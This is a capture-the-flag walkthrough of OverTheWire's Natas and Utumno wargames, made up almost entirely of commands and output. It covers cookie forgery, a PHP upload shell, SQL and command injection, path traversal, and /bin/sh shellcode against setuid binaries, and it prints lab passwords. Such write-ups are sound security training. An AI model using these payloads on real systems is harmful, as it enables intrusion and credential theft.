# Natas wargame: Level 11 to 16


Level 11

# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data "submit=&bgcolor=#ffffff" --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org
# cat xor_encrypt
#!/usr/bin/php
<?php
// xor_encrypt: base64-decode the first command-line argument and XOR it
// byte-wise against a repeating mask built from the JSON form of the
// default cookie array. The raw (binary) result is written to stdout.
// Usage: ./xor_encrypt <base64-string>
$mask = json_encode(array("showpassword"=>"no","bgcolor"=>"#ffffff"));
$maskLen = strlen($mask);
$input = base64_decode($argv[1]);
$result = "";
foreach (str_split($input) as $pos => $byte) {
    // XOR of two one-character strings yields one character
    $result .= $byte ^ $mask[$pos % $maskLen];
}
echo $result;
?>
# grep natas natas11.cookie
natas11.natas.labs.overthewire.org      FALSE   /       FALSE   0       data    ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
# ./xor_encrypt ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw
qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq
# cat set_cookie
#!/usr/bin/php
<?php
// set_cookie: XOR the JSON form of the cookie array against the key given
// as the first command-line argument (repeated as needed) and print the
// result base64-encoded.
// Usage: ./set_cookie <key>
$mask = $argv[1];
$maskLen = strlen($mask);
$payload = json_encode(array("showpassword"=>"yes","bgcolor"=>"#ffffff"));
$encoded = "";
foreach (str_split($payload) as $pos => $byte) {
    // XOR of two one-character strings yields one character
    $encoded .= $byte ^ $mask[$pos % $maskLen];
}
echo base64_encode($encoded);
?>
# ./set_cookie qw8J
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
# string=`./set_cookie qw8J`
# sed -i "s/data\t.*%3D/data\t$string/" natas11.cookie
# wget --quiet -O - --user=natas11 --password=SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6 --post-data 'submit=&bgcolor=#ffffff' --load-cookies natas11.cookie --keep-session-cookies --save-cookies natas11.cookie http://natas11.natas.labs.overthewire.org | grep natas12 | awk '{print $6}' | cut -b -32
sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu
Level 12

# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: application/x-php\r\n\r\n<?php readfile("/etc/natas_webpass/natas13");?>\r\n--#--\r\n\r\n' http://natas12.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/oijrt0cyhv.php
# curl --silent --user natas12:sh7DrWKtb8xw9PIMkh8OQsgno6iZnJQu http://natas12.natas.labs.overthewire.org/upload/oijrt0cyhv.php
IGCXqS4x472aoHZYaidvmeoWj2GmuRYz
Level 13

# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz --request POST --header "Content-Type: multipart/form-data; boundary=#" --data $'--#\r\nContent-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n1000\r\n--#\r\nContent-Disposition: form-data; name="filename"\r\n\r\nfuckyou.php\r\n--#\r\nContent-Disposition: form-data; name="uploadedfile"; filename="fuckyou.php"\r\nContent-Type: image/jpg\r\n\r\n'"`echo -n "ffd8ff" | xxd -p -r`"$'<?php readfile("/etc/natas_webpass/natas14");?>\r\n--#--\r\n\r\n' http://natas13.natas.labs.overthewire.org | grep upload | awk -F\" '{print $2}'
upload/pmg8woiyek.php
# curl --silent --user natas13:IGCXqS4x472aoHZYaidvmeoWj2GmuRYz http://natas13.natas.labs.overthewire.org/upload/pmg8woiyek.php | cut -b 4-
sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh
Level 14

# curl --silent --user natas14:sSkCeug1bdrYejzAaBhgwI3qJXDKqlgh --request POST --data "username=\"or true#" http://natas14.natas.labs.overthewire.org | grep natas15 | awk '{print $8}' | cut -b -32
m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV
Level 15

# j=1; while [ true ]; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and length(password)=$j#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo $j; break; fi; j=$[$j+1]; done
32
# for i in `seq $j`; do for k in `seq 33 126`; do result=`curl --silent --user natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV --request POST --data "username=natas16\" and ascii(substr((select password),$i,1))=$k#" http://natas15.natas.labs.overthewire.org | grep "This user exists"` ; if [ "$result" != "" ]; then echo "obase=16;ibase=10;$k" | bc -l | xxd -p -r ; break; fi; done; done; echo
3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L
Level 16

# wget --quiet -O - --user=natas16 --password=3VfCzgaWjEAcmCQphiEPoXi9HtlmVr3L --post-data 'submit=&needle=$(cat /etc/natas_webpass/natas17 > /tmp/natas17)' http://natas16.natas.labs.overthewire.org > /dev/null
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;cat /tmp/natas17;' http://natas9.natas.labs.overthewire.org | grep -v -e ^$ -e ^\< | tail -n 1
9HBzt5ljtPAgmaYvNfZ8chZVq50oepsx




# Natas wargame: Level 0 to 10


Level 0

# wget --quiet -O - --user=natas0 --password=natas0 http://natas0.natas.labs.overthewire.org | grep natas1 | awk '{print $6}'
9hSaVoey44Puz0fbWlHtZh5jTooLVplC
Level 1

# wget --quiet -O - --user=natas1 --password=9hSaVoey44Puz0fbWlHtZh5jTooLVplC http://natas1.natas.labs.overthewire.org | grep natas2 | awk '{print $6}'
aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl
Level 2

# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org | grep files
<img src="files/pixel.png">
# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org/files
# wget --quiet -O - --user=natas2 --password=aRJMGKT6H7AOfGwllwocI2QwVyvo7dcl http://natas2.natas.labs.overthewire.org/files/users.txt | grep natas3 | awk -F\: '{print $2}'
lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb
Level 3

# wget --quiet -O - --user=natas3 --password=lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb http://natas3.natas.labs.overthewire.org/robots.txt | grep Disallow
Disallow: /s3cr3t/
# wget --quiet -O - --user=natas3 --password=lOHYKVT34rB4agsz1yPJ2QvENy7YnxUb http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt | grep natas4 | awk -F\: '{print $2}'
8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz
Level 4

# wget --quiet -O - --user=natas4 --password=8ywPLDUB2yY2ujFnwGUdWWp8MT4yZrqz --referer=http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org | grep natas5 | awk '{print $8}'
V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z
Level 5

# wget --quiet -O - --user=natas5 --password=V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --keep-session-cookies --save-cookies natas5.cookie http://natas5.natas.labs.overthewire.org
# sed -i 's/0$/1/' natas5.cookie
# wget --quiet -O - --user=natas5 --password=V0p12qz30HEUU22dz7CZGHiFk3VdPA9Z --keep-session-cookies --load-cookies natas5.cookie http://natas5.natas.labs.overthewire.org | grep natas6 | awk '{print $8}' | awk -F\< '{print $1}'
mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU
Level 6

# wget --quiet -O - --user=natas6 --password=mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU http://natas6.natas.labs.overthewire.org/includes/secret.inc | grep secret | awk -F\" '{print $2}'
FOEIUWGHFEEUHOFUOIU
# wget --quiet -O - --user=natas6 --password=mfPYpp1UBKKsx7g4F0LaRjhKKenYAOqU --post-data 'submit=&secret=FOEIUWGHFEEUHOFUOIU' http://natas6.natas.labs.overthewire.org | grep natas7 | awk '{print $8}'
XLoIufz83MjpTrtPvP9iAtgF48EWjicU
Level 7

# wget --quiet -O - --user=natas7 --password=XLoIufz83MjpTrtPvP9iAtgF48EWjicU http://natas7.natas.labs.overthewire.org | grep natas8
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
# wget --quiet -O - --user=natas7 --password=XLoIufz83MjpTrtPvP9iAtgF48EWjicU http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8 | grep -v -e \< -e ^$
maabkdexUStb6JJXUqmBx7Re8M61cksn
Level 8

# wget --quiet -O - --user=natas8 --password=maabkdexUStb6JJXUqmBx7Re8M61cksn http://natas8.natas.labs.overthewire.org/index-source.html | sed -e 's/color/\n/g' | grep -m 1 DD0000 | awk -F\" '{print $3}'
3d3d516343746d4d6d6c315669563362
# echo -n "3d3d516343746d4d6d6c315669563362" | xxd -p -r | rev | base64 --decode && echo
oubWYf2kBq
Level 9

# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;/usr/bin/find / | /bin/grep natas10;' http://natas9.natas.labs.overthewire.org | grep natas10
/var/www/natas/natas10
/home/natas10
/home/natas10/.bashrc
/home/natas10/.bash_logout
/home/natas10/.profile
/etc/apache2/sites-available/VHOST.natas10.natas.labs.overthewire.org
/etc/apache2/sites-enabled/VHOST.natas10.natas.labs.overthewire.org
/etc/natas_webpass/natas10
# wget --quiet -O - --user=natas9 --password=sQ6DKR8ICwqDMTd48lQlJfbF1q9B3edT --post-data 'submit=&needle=;/bin/echo "#$(/bin/cat /etc/natas_webpass/natas10)#";' http://natas9.natas.labs.overthewire.org | awk -F\# '{print $2}' | grep -v ^$
s09byvi8880wqhbnonMFMW8byCojm8eA
Level 10

# wget --quiet -O - --user=natas10 --password=s09byvi8880wqhbnonMFMW8byCojm8eA --post-data 'submit=&needle=. /etc/natas_webpass/natas11 #"' http://natas10.natas.labs.overthewire.org | grep -v -e ^\< -e ^$ | tail -n 1
SUIRtXqbB3tWzTOgTAX2t8UfMbYKrgp6

# Utumno wargame: Level 6


# ssh utumno6@utumno.labs.overthewire.org
utumno6@utumno.labs.overthewire.org's password:65696c75717569657468

utumno6@melissa$ file /utumno/utumno6
/utumno/utumno6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno6@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno6@melissa$ /tmp/u6/getenvaddr EGG /utumno/utumno6
EGG will be at 0xffffd977
utumno6@melissa$ /utumno/utumno6 `perl -e 'print "-1 ffffd6ac \x77\xd9\xff\xff" . "\xff"x60 . "\x77\xd9\xff\xff"'`
Table position -1 has value -9865
Description: 1À°
                Rh//shh/binãRâSáÍ
$ /usr/bin/whoami
utumno7
$ /bin/cat /etc/utumno_pass/utumno7
746f7469717565676165

# Utumno wargame: Level 5


# ssh utumno5@utumno.labs.overthewire.org
utumno5@utumno.labs.overthewire.org's password:776f756361656a69656b

utumno5@melissa$ file /utumno/utumno5
/utumno/utumno5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno5@melissa$ mkdir /tmp/u5
utumno5@melissa$ cd !$
utumno5@melissa$ cat execve2.c
#include <unistd.h>
int main(){
        /* Replace this process with /tmp/u5/getenvaddr, handing it a fixed
         * argv and a hand-built environment. The byte lengths and order of
         * every string below determine where getenvaddr finds EGG, so the
         * block cannot be reordered or resized without recomputing the
         * printed address; presumably it must match execve.c exactly — confirm. */
        char *args[4];
        char *env[12];
        args[0]="/tmp/u5/getenvaddr";
        args[1]="EGG";
        args[2]="/utumno/utumno5";
        /* NOTE(review): this is the four-character string "NULL", not a null
         * pointer, so the argv passed to execve() is not NULL-terminated
         * (undefined behaviour). The terminator should be `args[3]=NULL;`. */
        args[3]="NULL";
        /* Nine empty strings, then 16 bytes of 0x90 followed by the four
         * placeholder bytes a1 a2 a3 a4, then the EGG variable (four
         * placeholder bytes b1..b4 followed by an opaque byte string). */
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xa1\xa2\xa3\xa4";
        env[10]="EGG=\xb1\xb2\xb3\xb4\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        /* execve() returns only on failure; the return value is not checked,
         * so a failed exec silently falls through to main's implicit return. */
        execve("/tmp/u5/getenvaddr",args,env);
}
utumno5@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

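int main(int argc,char *argv[]){
        /* Print the address at which the environment variable named by
         * argv[1] is expected to sit when the program named by argv[2] runs
         * with the same environment as this process.
         *
         * argv[1]: name of the environment variable to look up
         * argv[2]: path of the target program (only its length is used)
         *
         * Returns 0 on success, 1 on a usage error or if the variable is not
         * set; the original code dereferenced argv and the getenv() result
         * without either check. */
        if (argc < 3 || argv[1] == NULL || argv[2] == NULL) {
                fprintf(stderr, "usage: %s VARNAME TARGET_PATH\n",
                        argv[0] != NULL ? argv[0] : "getenvaddr");
                return 1;
        }
        char *ptr = getenv(argv[1]);
        if (ptr == NULL) {
                /* getenv() yields NULL for an unset name; adding an offset to
                 * it would be undefined behaviour. */
                fprintf(stderr, "%s is not set in the environment\n", argv[1]);
                return 1;
        }
        /* Shift by the difference between this program's name length and the
         * target's, computed in signed arithmetic so a longer target name
         * moves the pointer backwards instead of relying on size_t wrap-around.
         * Author's note on the missing factor of 2: the name appears only in
         * argv, not additionally in an env var — why that suffices here is
         * not established by this file; verify against the target. */
        ptr += (long)strlen(argv[0]) - (long)strlen(argv[2]);
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}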
utumno5@melissa$ gcc -m32 -o execve2 execve2.c && gcc -m32 -o getenvaddr getenvaddr.c
utumno5@melissa$ ./execve2
EGG will be at 0xffffdfc9
utumno5@melissa$ gdb -q
(gdb) #>address+shellcode
(gdb) print /x 0xffffdfc9 - 0x4
$1 = 0xffffdfc5
(gdb) #>EGG=address+shellcode
(gdb) print /x 0xffffdfc9 + 0x4
$2 = 0xffffdfcd
(gdb) #>shellcode
utumno5@melissa$ cat execve.c
#include <unistd.h>

int main(){
        /* Replace this process with /utumno/utumno5 under a hand-built
         * environment whose byte layout mirrors execve2.c, with the
         * placeholder bytes replaced by values from the gdb session above:
         * env[9] ends in c5 df ff ff (little-endian 0xffffdfc5) and env[10]
         * starts with cd df ff ff (little-endian 0xffffdfcd). String lengths
         * and order must not change, or those values no longer apply. */
        char *env[12];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc5\xdf\xff\xff";
        env[10]="EGG=\xcd\xdf\xff\xff\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        /* NOTE(review): argv is passed as NULL. Linux tolerates this, but
         * POSIX does not promise it; a portable caller passes an array
         * containing at least a NULL terminator. execve() returns only on
         * failure and the result is not checked. */
        execve("/utumno/utumno5",NULL,env);
}
utumno5@melissa$ gcc -m32 -o execve execve.c
utumno5@melissa$ ./execve
Here we go - Åßÿÿ
$ /usr/bin/whoami
utumno6
$ /bin/cat /etc/utumno_pass/utumno6
65696c75717569657468